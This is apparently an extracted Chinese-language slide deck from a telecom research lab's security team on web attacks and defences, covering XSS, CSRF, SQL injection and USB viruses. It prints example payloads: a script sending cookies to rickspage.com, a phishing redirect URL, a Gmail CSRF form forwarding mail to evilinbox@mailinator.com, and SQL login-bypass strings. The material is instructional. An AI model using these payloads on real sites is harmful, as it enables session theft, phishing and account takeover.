1

-TL Proprietary-

資通安全的實務面與安全機制

中華電信研究所 資通安全研究室

2

-TL Proprietary-

80Port

的攻擊

問題在哪裡 ?

過去一年內，被植入惡意程式的國內網站達 383個，純粹遭入侵的網站則高達 1,483 個

資料來源 : TrandMicro

安全問題被重視

圖檔資料來源 : TrandMicro

3

-TL Proprietary-

藉由 HTTP 散播的攻擊手法

知名網站

瀏覽者

3. 背景導向惡意連結

2. 植入惡意連結1. 攻擊網站漏洞

4. 植入惡意程式碼

5. 竊取資訊至伺服器

殭屍網路惡意連結

SQL injection

瀏覽網頁

竊取資料

犯罪者

取得資料

Web Threats !!資料來源 : TrandMicro

4

-TL Proprietary-

常見的威脅

5

-TL Proprietary-

網路安全威脅及其解決方案威脅 解決方法 解決方案

冒用 強化用戶身分識別 密碼憑證　OTP智慧卡生物識別

滲透 強化伺服器入侵偵測弱點檢測

修正檔管理防火牆入侵防禦系統入侵偵測系統弱點評估

阻斷服務 封包過濾 入侵防禦系統入侵偵測系統防火牆

中斷 Tunneling IPSec VPNSSL VPN專線

6

-TL Proprietary-

網路安全威脅及其解決方案 ( 續 )

威脅 解決方法 解決方案

竊聽 加密

隔離網路

SSLIPSec虛擬鍵盤防火牆VPN

違反授權 權限管理

實體隔離

ID Management稽核防火牆機房管理

否認 使用不可否認性的交易協定 SSLSET

網路釣魚 強化網站識別瀏覽器防護

網站憑證修正檔管理

7

-TL Proprietary-

攻擊的 3 大主流與防衛 4 大構面

攻擊

近年來攻擊目標已集中在 Web AP( 網站 )攻擊、 Phising 、無線網路攻擊以及 USB病毒

防衛

8

-TL Proprietary-

Web AP( 網站 ) 安全

太多攻擊SQL Injection, XSS, Phising…

Source Code Scan

(Code Review)

IPS/Web AP FireWall

Vulnerability Audit

網站防竄改系統

IDC 統計 : 超過 75% 的網路資安事件是針對 Web 應用程式

而來06 年底無名小站遭 XSS 攻擊

…Microsoft 人 員 必讀

Penetration Test

9

-TL Proprietary-

網路 主機 應用程式

版本更新服務最小化

ex: Port 80.443

避免使用預設密碼

程式撰寫準則

版本更新

靜態檢查( 原始碼檢測 )

動態檢查( 沙箱測試、錯

誤植入測試 )

網路 主機 應用程式

更新設備 版本更新備援機制 檢視與分析日誌

記錄

版本更新弱點掃描滲透測試備援機制

備援機制

維護階段之安全設定

架設系統階段之安全設定Web AP 安全設定

Web AP Firewall / IDS

10

-TL Proprietary-

網站程式開發安全過濾

使用者輸入內容

妥善處理錯誤訊息容

檢查上傳內容

敏感資訊要妥善處理

將密碼以編碼方式儲進資料

庫

前後、端都要檢查

使用者輸入

11

-TL Proprietary-

XSS(Cross-Site Scripting) Injection

為了與 CSS(Cascading Style Sheet) 區別 將此縮寫為 XSS那有沒有 CSS 攻擊 ? YES CSS 重新定義讓 User 不查點選

惡意攻擊者往 Web 頁面裏插入惡意 html 代碼，當用戶瀏覽該頁之時，嵌入其中 Web 裏面的 html 代碼會被執行，從而達到惡意用戶的特殊目的

使加密連線失效，駭客竊取使用者的個人資料。 駭客可冒用使用者身分，存取具身分控管機制的網站。 重導瀏覽器連線釣魚網站，以騙取帳號密碼等個人資訊。 將使用者瀏覽器導向惡意網站，下載並安裝惡意後門程式

於使用者電腦中。 導致使用者瀏覽器無法正常運作。

XSS was discovered on or before 1996

12

-TL Proprietary-

XSS 例子Rick 是一個惡意的使用者，他在 Joe 的網站註冊了個帳號並且完成他的個人資料頁面填寫。在他的個人資料中包含了下面這樣一段文字：<script>alert('Hello World');</script>

當 Joe ( 或其他人 ) 瀏覽 Rick 的個人資料，他就會看到一個討厭的彈出式視窗

Rick 有點狡猾，在 Joe 網站上的 BLOG 評論放置了下面這樣的程式碼：

<a href="/usercp.php?action=logout"> 一個關於貓的網頁 </a>

當 Joe ( 或其他人 ) 點選了連結，以為會看到一個關於貓的網頁，卻會因此登出這個網站

Rick 在 Joe 頁面上的留言放入了下面程式碼：

<script>location.replace('http://rickspage.com/?secret='+document.cookie)</script>

當 Joe ( 或其他人 ) 瀏覽留言板，他就會被引導到 Rick 的網站。麻煩的是， Joe 瀏覽器紀錄連線資訊的 cookie 被當作網址的一部分傳遞到 Rick 的網頁伺服器。

13

-TL Proprietary-

XSS 攻擊手法 釣魚 竊取

HTMLEvilScript

Mail 告訴您有“好處”馬上去

HTMLEvilScript

HTMLEvilScript`

HTML

HTML

HTML

14

-TL Proprietary-

XSS 釣魚 實例網 站 原 始 頁 面 ： 網 址 http://1X.XX.XXX.3/mXX/frame.jsp 會 自 動 導 到http://1X.XX.XXX.3/mXX/index.jsp

使 用 javascript 的 script 方式測試弱點型態

反射內容剛好在 <frame> 內的 src 標籤，因此判斷應該使用這項特性配合釣魚攻擊來滲透。

在 http://10.144.118.230:8080/ 下設置兩支程式fish-login.jsp 及 cachepswd.jsp

http://1X.XX.XXX.3/mXX/frame.jsp?url=%68%74%74%70%3a%2f%2f%31%30%2e%31%34%34%2e%31%31%38%2e%32%33%30%3a%38%30%38%30%2f%66%69%73%68%2d%6c%6f%67%69%6e%2e%6a%73%70

帳號密碼已被竊取

http://1X.XX.XXX.3/mXX/frame.jsp?url=http://10.144.118.230:8080/fish-login.jsp

15

-TL Proprietary-

CSRF(XSRF) Cross-site Request Forgery

跨站冒名請求

A CSRF attack forces a logged-on victim’s browser to send a request to a vulnerable web application, which then performs the chosen action on behalf of the victim.

OWASP TOP 10 2007

The first CSRF was documented in May 2000!

Session Riding, One-Click Attacks, Cross Site Reference Forgery, Hostile Linking, Automation Attack

16

-TL Proprietary-

CSRF 實例 Gmail 事件 2007-09

http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter

<html><body><form name="form" method="POST" enctype="multipart/form-data"action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf"><input type="hidden" name="cf2_emc" value="true"/><input type="hidden" name="cf2_email"value="evilinbox@mailinator.com"/><input type="hidden" name="cf1_from" value=""/><input type="hidden" name="cf1_to" value=""/><input type="hidden" name="cf1_subj" value=""/><input type="hidden" name="cf1_has" value=""/><input type="hidden"name="cf1_hasnot" value=""/><input type="hidden" name="cf1_attach" value="true"/><input type="hidden" name="tfi" value=""/><input type="hidden" name="s" value="z"/><input type="hidden" name="irf" value="on"/><input type="hidden" name="nvp_bu_cftb" value="Create Filter"/></form><script>form.submit()</script></body></html>

資料來源 : CLIENT-SIDE SECURITYOverview of various Client-Side Hacking Tricks and Techniques

17

-TL Proprietary-

XSS and CSRF

The first CSRF was documented in May 2000!

XSS was discovered on or before 1996

Did it really take around 4 years for us to discover CSRF?

CSRF某程度上是一種 XSS 的應用 !CSRF 的要素 : User登入 /壞人偽造 Request

Javascript Hijacking某程度上是一種 CSRF 的應用 !

以上的說法僅為基本實務上的認知，不盡然為正確 ! 目前較嚴謹的定義可參考 OWASP Top Ten

18

-TL Proprietary-

Javascript Hijacking許多網站皆引入 Web 2.0 的概念，大量使用 Ajax 與 JSON 技術，透過非同步載入資料的方式，提供許多互動功能。這些載入資料就是 JavaScript Hijacking 的目標。

JSON

http://blog.roodo.com/rocksaying/archives/2955557.html

Script 連結 繼承物件 取出資料

19

-TL Proprietary-

XSS and CSRF 圖說

引誘你點選連結

偽造原使用者置入 Gmail Filter 規則 , 使原使用者的 Gmail 信件都轉寄到指定的地方或直接取得原使用人的通訊錄

引誘你點選連結 Gmail CSRF 漏洞 (2007-09)

20

-TL Proprietary-

CSRF 防範Ensure that there are no XSS vulnerabilities in your application

Insert custom random tokens into every form and URL

安全碼 / One Time Password

For sensitive data or value transactions, re-authenticate or use transaction signing

Do not use GET requests (URLs) for sensitive data or to perform valuetransactions

POST alone is insufficient a protection

21

-TL Proprietary-

SQL InjectionSQL Injection (SQL 指令植入式攻擊 , 資料隱碼攻擊 ) ，屬於 Input

Validation 的問題。SQL Injection 攻擊法並非植入電腦病毒，它是描述一個利用寫入特殊 SQL

程式碼攻擊應用程式的動作。

select * from member where UID =' "& request("ID") &" ‘ And Passwd =' "& request("Pwd") & " '

若攻擊者已知系統中有一個 Admin 的管理者帳號，則輸入 Admin '-- ， 則 Server端程式將之處理成 select * from member where UID =' Admin '-- ‘ And Passwd =' ' 此意謂 : 可不須輸入密碼而進入資料庫 -- 符號後的任何敘述都會被當作註解

( 以上面為例， And子句將被 SQL 視為說明用 )

22

-TL Proprietary-

正常連線狀態

資料來源 : 網頁的危機與防禦 賴溪松 教授

23

-TL Proprietary-

SQL Injection 攻擊

使用者帳號 ' or 1=1 -- ，密碼 asdf1234(任意輸入 )

資料來源 : 網頁的危機與防禦 賴溪松 教授

24

-TL Proprietary-

final String custID = httpRequest.getParameter("custID"); final String sql = “Select * From Customer Where CustomerID = ‘” + custID + “ ’ "

Select * From Customer Where CustomerID = 'cust1' or 1=1 -- '

25

-TL Proprietary-

防止 SQL Injection 建議事項

查詢參數過濾過濾特殊字元輸出驗証

限制輸入格式密碼 (A~Z, 0~9)Email Address

輸入長度檢查最大輸入字串長度檢查

Error Handling 資料庫權限設定

個別資料庫 Role 與 Login/User 。

26

-TL Proprietary-

防止 SQL Injection 實務例 ASP SqlCheckInclude.asp http://blogs.iis.net/nazim/archive/2008/04/28/filtering-sql-injection-from-classic-asp.aspx

<!--#include file="SqlCheckInclude.asp"-->

<% Response.Write("Welcome to the Test Page.")

Response.Write("If you are seeing this page then SQL validation succeeded.")

%> Java/JSP 使用 PreparedStatement

mod_security 是 Apache 的一個模組可以提供入侵偵測及防禦，它就如同是 web 應用程式的防火牆可以用來抵擋知名及不知名的攻擊如 SQL injection attacks 、 cross-site scripting 、 path traversal attacks

http://www.unixwiz.net/techtips/sql-injection.html

27

-TL Proprietary-

軟體開發之資訊安全管理問題

SDLC SecSDLC System Development Life

設計階段 程式開發階段

測試階段

產品銷售 /維護階段

教育訓練

概念 完成設計 測試計畫 完成程式 完成測試 上線 /銷售

安全小組查核

安全程式開發準則 白箱測試黑箱測試

28

-TL Proprietary-

28

Microsoft Team Developer 程式碼分析工具 (Static code analysis) 效能分析工具 高度整合 Unit testing 及 Code coverage工具 Microsoft 內部開發相關產品所採用的工具

J2EE PHP ASP

IBM Rational AppScan

29

-TL Proprietary-

Client 端安全與上網安全

安裝反間諜軟體

安裝反毒軟體

安裝更新檔

不下載沒簽章的元件

釣魚網站網頁木馬

不當下載 …

不到列為黑名單的網站

不隨意下載資料

2008/05/06Yahoo整合McAfee SiteAdvisor 到期 Search 中

30

-TL Proprietary-

上網時問題網站提醒

只是一種參考與提醒只是一種參考與提醒

31

-TL Proprietary-

終端防護

Safed End-Point Device

32

-TL Proprietary-

關於 USB 的防護 USB 病毒主要是利用 autorun.inf 將病毒植入電腦主機，或反

向從遭感染的主機把病毒散播到各種 USB介面的儲存裝置中。就是因為具有這種雙向傳遞的方式，病毒才能在電腦及USB儲存裝置中不斷擴散，而 autorun.inf 就是最主要的媒介。

身邊的所有的 USB 儲存裝置，都要清查裡頭是否有兩個隱藏檔

Autorun.infntdelect.com

防護測試1. Autorun.inf 的唯讀資料夾 ----- OK

2. 機碼啟動隨身碟的唯讀功能 --- 無效3. shift 鍵開啟隨身碟 ---------------- 無效4. 隨身碟磁區上右鍵開啟檔案總管 ------------- 無效5. 機碼關掉自動啟動功能 -------------------------- 無效

Wow! USB Protector

OpenSource

Ruby

33

-TL Proprietary-

NAC(Network Access Control) 架構

34

-TL Proprietary-

通道安全

Sniffer 竊聽 無線網路安全

SSL

uGate SSL

WiFi WPA 加密

IDS/IPS

35

-TL Proprietary-

防衛 4 大構面的安全架構

政策面

技術面

稽核面

教育面

上線檢查系統 資安規範自檢

資安規範自檢 弱點掃瞄 滲透測試

原始碼掃瞄

舉辦資安教育訓練

IRMAS PKI NIAS SSO

帳號集中 防毒軟體 OTP登入

弱點掃瞄

滲透測試資安委員會

…

36

-TL Proprietary-

安全的第一步 -- 政策面落實即將上線系統

上線檢查系統

安全檢測

效能檢測…

已上線系統 資安規範自檢

弱點掃瞄

滲透測試

IRMAS Server版

針對 Web Ap 系統的安全預先防衛針對資安規範進行全面例行檢查

原始碼掃瞄

LDAP 密碼政策與查驗

IRMAS: 針對 Client端進行安全檢查

Symantec: 針對 Client端進行防毒

37

-TL Proprietary-

技術面 -- 常見的威脅與防衛措施

IRMAS

防毒軟體

NIAS SSO IC 卡登入

兩階段登入

圖形密碼

IDS/IPS

IRMAS

uGate SSL VPN

OTP登入

弱點掃瞄 / 滲透測試

38

-TL Proprietary-

稽核面 -- 定期或即時弱點掃瞄分析與補強

網路安全

系統安全

網路應用安全(Web AP)

無線網路安全

上線系統安全檢查定期掃描資安規範自檢

即時安全監控處理 SOC

39

-TL Proprietary-

滲透測試 V.S. 駭客攻擊 駭客只需知道 ( 點 )

How :如何入侵 ? Why : 為什麼可以入侵成功

滲透測試則需要知道 ( 面 ) How :如何進行入侵 Why : 為什麼可以入侵成功 What :探測什麼 Which :需要哪些條件或工具 When :什麼是最好時機

只需找到一種入侵的方法

各種潛在可能入侵成功的方法 /甚至進行驗證

資料來源 : 網頁的危機與防禦 賴溪松 教授

40

-TL Proprietary-

滲透測試 V.S. 弱點掃描 弱點掃描使用自動化的掃描工具檢查伺服器上的安

全弱點 不真正執行弱點攻擊程式 測試已知的系統安全弱點只是滲透測試的一個步驟

滲透測試不只是掃描，同時亦試驗攻擊程式以取得遠端伺服器的控制真正執行弱點攻擊程式 包含完整的入侵及人和試探可能的系統弱點的存在

資料來源 : 網頁的危機與防禦 賴溪松 教授

41

-TL Proprietary-

何種安全機制之組合比較安全 ？

電腦安全設定檢查

IRMASUSB Lockdown

3G 網卡 /Modem Lockdown

USB Virus Detector

節能管理

修正檔管理防毒軟體安裝風險程式

NIAS SSO 與帳號集中管理

手機 OTP

Client端

安全設定準則 弱點分析

滲透測試 原始碼檢查

落實資安規範

IRMAS Server版 Agent開發

圖形影像密碼與兩階段密碼

uGate SSL VPN

IDS/IPS

Web AP/Server

開發中已完成

研究或待引進

42

-TL Proprietary-

Books

43

-TL Proprietary-

網站資源

44

-TL Proprietary-

可以研究與發展的課題 中文與知識安全碼

3X6+7=

打狗是指現在的哪裡

光

明

25

高雄

45

-TL Proprietary-

可以研究與發展的課題 Graphic Password

Pass-Go 2006

http://www.passgo.net/

Pass-Go 2006

http://www.passgo.net/

User畫上點或形狀及其位置為輸入資訊避免鍵盤測錄、避免網路竊聽並提高複雜度

User畫上點或形狀及其位置為輸入資訊避免鍵盤測錄、避免網路竊聽並提高複雜度

46

-TL Proprietary-

網站識別標幟設定好圖章後，登入一旦發現圖章消失，請提高警覺

Yahoo Sign-in Seal : 只能用同一 Browser 且同一電腦

兩階段帳號密碼 : 完美而無上述問題

47

-TL Proprietary-

可以研究與發展的課題 兩階段帳號密碼

IDPassword

ID

Password

比 Yahoo 安全圖章厲害( 可以在不同電腦上使用 )

1. 網路釣魚2.Off line破解

1. 網路釣魚2.Off line破解X

User自定圖章

1.先輸入 ID 以及提示的安全碼2.確認回傳的圖是您原先所指定的圖再輸入密碼

48

-TL Proprietary-

可以研究與發展的課題

WebGoatWebScarab

Wow!USB Protector

Nikto

BlueTooth 安全NFC手機安全

無線網路安全

Web 網路安全

資安攻擊技術攻擊行為分析技術

49

-TL Proprietary-

謝謝指教 !